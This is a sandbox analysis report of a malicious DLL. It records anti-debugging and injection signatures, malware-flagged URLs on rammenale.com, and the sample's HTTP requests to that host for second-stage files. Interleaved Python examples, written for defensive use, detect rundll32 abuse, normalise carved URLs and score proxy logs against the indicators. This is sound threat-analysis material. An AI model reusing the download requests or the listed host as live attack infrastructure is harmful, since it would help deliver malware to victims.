Windows Analysis Report
LLD5HDX0PS.dll

Overview

General Information

Sample name: LLD5HDX0PS.dll
renamed because original name is a hash value
Original sample name: 4b74d5e09bca4898a782e938a8f9889b9ebadf8b0f14368bca90d9d0e68da472.dll
Analysis ID: 1500944
MD5: 030a68e321dec0e77b4698fccc5d54db
SHA1: 7b792a49fe27a298343ba26db8cac5ccb150ff89
SHA256: 4b74d5e09bca4898a782e938a8f9889b9ebadf8b0f14368bca90d9d0e68da472
Tags: dllrammenale-com

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Execute DLL with spoofed extension
Sigma detected: rundll32 run dll from internet
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Rundll32 Activity
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
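Two of the Sigma hits above, "Execute DLL with spoofed extension" and "rundll32 run dll from internet", are the kind of thing a defender wants to reproduce over their own process-creation telemetry. The block below is an added example written for this page, not the sandbox's or the Sigma project's rule logic: it approximates what those two rule names describe by parsing the module argument out of a rundll32 command line and flagging a non-DLL extension or a UNC/URL location. The Sysmon-style event records, the hypothetical UNC host 203.0.113.5 and the allowed-extension set are all constructed assumptions.

```python
import ntpath
import re
from typing import Dict, List, Optional, Tuple

# Constructed process-creation events in the field layout of Sysmon Event ID 1.
# They are written for this example and are not events from the report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r'rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1',
     "ParentImage": r"C:\Windows\System32\loaddll32.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\user\AppData\Local\Temp\regit.tmp,DllMain",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\203.0.113.5\share\payload.dll,Start",   # hypothetical UNC host
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"svchost.exe -k netsvcs",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]

# Extensions rundll32 is legitimately asked to load (an assumption for this example).
EXPECTED_EXTENSIONS = {".dll", ".cpl"}

_RUNDLL32 = re.compile(r'^\s*"?[^"\s]*rundll32(?:\.exe)?"?\s+(?P<rest>.*)$', re.IGNORECASE)


def rundll32_module(cmdline: str) -> Optional[str]:
    """Return the module path from 'rundll32.exe <module>,<entry> [args]', or None."""
    m = _RUNDLL32.match(cmdline)
    if not m:
        return None
    rest = m.group("rest")
    if rest.startswith('"'):                     # quoted module may contain spaces
        end = rest.find('"', 1)
        module = rest[1:end] if end > 0 else rest[1:]
    else:                                        # unquoted: ends at ',' or whitespace
        module = re.split(r"[,\s]", rest, maxsplit=1)[0]
    return module or None


def is_spoofed_extension(module: str) -> bool:
    """True when the module carries an extension outside EXPECTED_EXTENSIONS.
    A missing extension is tolerated because LoadLibrary appends '.dll' itself."""
    ext = ntpath.splitext(module)[1].lower()
    return bool(ext) and ext not in EXPECTED_EXTENSIONS


def is_remote_location(module: str) -> bool:
    """True for UNC or URL module paths, i.e. a DLL pulled from the network."""
    low = module.lower()
    return low.startswith("\\\\") or low.startswith("http://") or low.startswith("https://")


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule_name, command_line) pairs for every rundll32 event that matches."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        if not ev["Image"].lower().endswith("\\rundll32.exe"):
            continue
        module = rundll32_module(ev["CommandLine"])
        if module is None:
            continue
        if is_spoofed_extension(module):
            hits.append(("rundll32_dll_spoofed_extension", ev["CommandLine"]))
        if is_remote_location(module):
            hits.append(("rundll32_dll_from_remote_location", ev["CommandLine"]))
    return hits


if __name__ == "__main__":
    for rule, cmd in detect(SAMPLE_EVENTS):
        print(f"{rule}: {cmd}")
```

Only the regit.tmp and UNC events fire; the sample's own .dll load and the shell32.dll control-panel invocation do not, which is the false-positive profile you want before turning such a check into an alert. Parents like loaddll32.exe are sandbox harness processes and should be excluded when the events come from an analysis VM rather than a fleet.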

Classification

AV Detection

Source: https://rammenale.com/for2/regit.tmp%S Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpsoft Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclogID Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpgQ Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4z Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4w Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpmbt Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4m Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpnf Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp44uz Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp?J Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp%f Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpOJ Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt6634-1003.mun Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt6634-1003 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4F Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4D Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmph Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpP Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpK Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtC: Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpuS Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpS Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtl Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtsoft Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtg Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpG Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtu Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txts Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtr Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtq Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpE Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp0 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp1 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp3w Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtz Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp8 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp: Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp3 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4I Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4# Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpent Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtx4C Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtJ Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtI Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtfs: Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtM3 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmprI3- Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtT Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt44 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp&bt Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtP Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpentfc Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4G Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp0s Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpkbu Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regM Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp(f Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpkJ Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtf Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtd Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpWJz Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpsC: Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt_ Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4X Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4W Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp6634-1003Vbt Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt) Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtent Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4$ Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp~ Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4P Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt2 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmplS Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4h Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpq Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt: Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt9 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpl Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpm Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpBJj Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtF2 Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclogDevice Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtC Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpz Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtA Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpC: Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpu Avira URL Cloud: Label: malware
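The long list of Avira verdicts above, like the "String found in binary or memory" list in the Networking section, is mostly one pair of URLs carved from process memory with trailing bytes from neighbouring data (regit.tmp%S, aclog.txtC:) or with the tail missing (aclog, regM). Before these go into a blocklist they should be collapsed onto the two URLs the sandbox actually requested. The block below is an added example, not part of the report: it resolves each carved string against the canonical URLs seen on the wire, refuses ambiguous fragments such as a bare scheme+host, and leaves the rest for manual review. The carved input is a constructed subset of the strings on this page.

```python
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# Canonical URLs: the two paths the sandbox actually requested over HTTPS.
CANONICAL: List[str] = [
    "https://rammenale.com/for2/regit.tmp",
    "https://rammenale.com/for2/aclog.txt",
]

# Constructed subset of the carved strings listed on this page (memory strings pick up
# neighbouring bytes as a suffix, or lose their tail when the buffer was overwritten).
CARVED: List[str] = [
    "https://rammenale.com/for2/regit.tmp%S",
    "https://rammenale.com/for2/regit.tmpsoft",
    "https://rammenale.com/for2/aclogID",
    "https://rammenale.com/for2/aclog.txt6634-1003.mun",
    "https://rammenale.com/for2/aclog.txtC:",
    "https://rammenale.com/for2/regit.tmp",
    "https://rammenale.com/for2/aclog.txt",
    "https://rammenale.com/for2/regM",
    "https://rammenale.com/for2/aclog",
    "https://rammenale.com/",
    "https://login.live.com",
    "http://www.Dc.",
]


def _dir_prefix(url: str) -> str:
    """The URL up to and including the last '/' of its path."""
    return url.rsplit("/", 1)[0] + "/"


def resolve(carved: str, canonical: List[str]) -> Optional[str]:
    """Map one carved string to a canonical URL, or None when it cannot be done safely."""
    # Case 1: canonical URL followed by junk bytes. Prefer the longest match.
    hits = [c for c in canonical if carved.startswith(c)]
    if hits:
        return max(hits, key=len)
    # Case 2: truncated canonical URL. The fragment must reach past the directory,
    # so a bare scheme+host (a prefix of every URL on that host) never resolves,
    # and exactly one canonical URL must fit.
    hits = [c for c in canonical
            if c.startswith(carved) and len(carved) > len(_dir_prefix(c))]
    return hits[0] if len(hits) == 1 else None


def normalize(carved: List[str], canonical: List[str]) -> Tuple[Dict[str, List[str]], List[str]]:
    """Group carved strings under their canonical URL; return the leftovers for manual review."""
    mapping: Dict[str, List[str]] = {c: [] for c in canonical}
    unresolved: List[str] = []
    for s in carved:
        target = resolve(s, canonical)
        if target is None:
            unresolved.append(s)
        else:
            mapping[target].append(s)
    return mapping, unresolved


def host_path_iocs(mapping: Dict[str, List[str]]) -> List[Tuple[str, str]]:
    """(host, path) pairs for every canonical URL that at least one carved string supports."""
    pairs = set()
    for url, variants in mapping.items():
        if variants:
            parts = urlsplit(url)
            pairs.add((parts.hostname, parts.path))
    return sorted(pairs)


if __name__ == "__main__":
    mapping, unresolved = normalize(CARVED, CANONICAL)
    for url, variants in mapping.items():
        print(f"{url}  <- {len(variants)} carved variant(s)")
    print("unresolved (review by hand):", unresolved)
    print("IOCs:", host_path_iocs(mapping))
```

The rule is deliberately conservative: "aclogID" and "regM" could be guessed, but a prefix-only match on a shared directory is how unrelated paths on the same host end up in a blocklist, so they are surfaced rather than resolved. Strings from other hosts (login.live.com, the "http://www.Dc." fragment) stay out of the IOC set entirely.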
Source: LLD5HDX0PS.dll Virustotal: Detection: 10%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 96.7% probability
Source: LLD5HDX0PS.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: LLD5HDX0PS.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE1B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW, 0_2_6BEE1B85
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEF38F4 FindFirstFileExW, 0_2_6BEF38F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE61B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW, 3_2_6FE61B85
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE738F4 FindFirstFileExW, 3_2_6FE738F4

Networking

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 131.153.206.231 443
Source: Joe Sandbox View ASN Name: SS-ASHUS SS-ASHUS
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected:
  GET /for2/regit.tmp HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rammenale.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /for2/aclog.txt HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rammenale.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /for2/aclog.txt HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rammenale.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /for2/regit.tmp HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rammenale.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /for2/regit.tmp HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rammenale.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /for2/aclog.txt HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rammenale.com
  Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected:
  GET /for2/regit.tmp HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rammenale.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /for2/aclog.txt HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rammenale.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /for2/aclog.txt HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rammenale.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /for2/regit.tmp HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rammenale.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /for2/regit.tmp HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rammenale.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /for2/aclog.txt HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rammenale.com
  Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: rammenale.com
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 1251
  date: Thu, 29 Aug 2024 04:53:05 GMT
  server: LiteSpeed
  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 1251
  date: Thu, 29 Aug 2024 04:53:05 GMT
  server: LiteSpeed
  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 1251
  date: Thu, 29 Aug 2024 04:53:05 GMT
  server: LiteSpeed
  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 1251
  date: Thu, 29 Aug 2024 04:53:05 GMT
  server: LiteSpeed
  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 1251
  date: Thu, 29 Aug 2024 04:53:05 GMT
  server: LiteSpeed
  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 1251
  date: Thu, 29 Aug 2024 04:53:05 GMT
  server: LiteSpeed
  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
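The exchange above gives a complete network indicator set: six TLS 1.2 sessions to 131.153.206.231:443, Host rammenale.com, the two paths /for2/regit.tmp and /for2/aclog.txt, the JA3 hash 37f463bf4616ecd445d4a1937da06e19, and a User-Agent that is the default string the Windows HTTP stack sends for programs that set none. Every request got a 404 at analysis time (29 Aug 2024), so the sandbox never received whatever those two files carry. The block below is an added example, not code from the report: it scores proxy-style records against those indicators, treating host plus path as the real signal and JA3 or User-Agent as corroboration only, because both come from the OS stack and legitimate software sends the same values. The log records and the field layout are constructed assumptions; 203.0.113.10 and the example.* hosts are placeholders.

```python
from typing import Dict, List, Tuple

# Indicators taken from the Networking section of this report.
IOC_HOST = "rammenale.com"
IOC_PATHS = {"/for2/regit.tmp", "/for2/aclog.txt"}
IOC_IP = "131.153.206.231"
IOC_JA3 = "37f463bf4616ecd445d4a1937da06e19"
IOC_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; "
          ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)")

# Constructed records in the shape a TLS-inspecting proxy might log (an assumption).
# The first two mirror the sandbox traffic; the others are benign look-alikes.
SAMPLE_LOG: List[Dict] = [
    {"src": "192.168.2.6", "dst": "131.153.206.231", "dport": 443, "ja3": IOC_JA3,
     "host": "rammenale.com", "uri": "/for2/regit.tmp", "ua": IOC_UA, "status": 404},
    {"src": "192.168.2.6", "dst": "131.153.206.231", "dport": 443, "ja3": IOC_JA3,
     "host": "rammenale.com", "uri": "/for2/aclog.txt", "ua": IOC_UA, "status": 404},
    # Same JA3 and User-Agent, different destination: an ordinary Windows client.
    {"src": "192.168.2.7", "dst": "203.0.113.10", "dport": 443, "ja3": IOC_JA3,
     "host": "update.example.net", "uri": "/v1/catalog", "ua": IOC_UA, "status": 200},
    # Same server IP, different Host header and client stack.
    {"src": "192.168.2.8", "dst": "131.153.206.231", "dport": 443, "ja3": "0" * 32,
     "host": "other.example.org", "uri": "/", "ua": "curl/8.0", "status": 200},
]


def score(rec: Dict) -> Tuple[int, List[str]]:
    """Weight the indicators: host+path is the strong signal, the server IP is medium,
    JA3 and User-Agent only corroborate."""
    total, reasons = 0, []
    if rec["host"] == IOC_HOST and rec["uri"] in IOC_PATHS:
        total += 80
        reasons.append("c2-host-and-path")
    elif rec["host"] == IOC_HOST:
        total += 50
        reasons.append("c2-host")
    if rec["dst"] == IOC_IP and rec["dport"] == 443:
        total += 30
        reasons.append("c2-ip")
    if rec["ja3"] == IOC_JA3:
        total += 5
        reasons.append("ja3")
    if rec["ua"] == IOC_UA:
        total += 5
        reasons.append("user-agent")
    return total, reasons


def triage(log: List[Dict], threshold: int = 50) -> List[Dict]:
    """Return the records worth escalating. 'payload_served' records whether the server
    answered 200; in the sandbox run every request for these paths got a 404."""
    hits = []
    for rec in log:
        total, reasons = score(rec)
        if total >= threshold:
            hits.append({"src": rec["src"], "uri": rec["uri"], "score": total,
                         "reasons": reasons, "payload_served": rec["status"] == 200})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```

With the threshold at 50, only the two records that reproduce the sandbox traffic are escalated; the Windows client that merely shares the JA3 and User-Agent scores 10, and a connection to the same IP under another Host header scores 30 and is left for a second look rather than an alert. A hit in your own telemetry that carries a 200 rather than the 404 seen here means the second stage was actually delivered and deserves more attention than this report can give it.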
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.Dc.
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000813B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F96000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
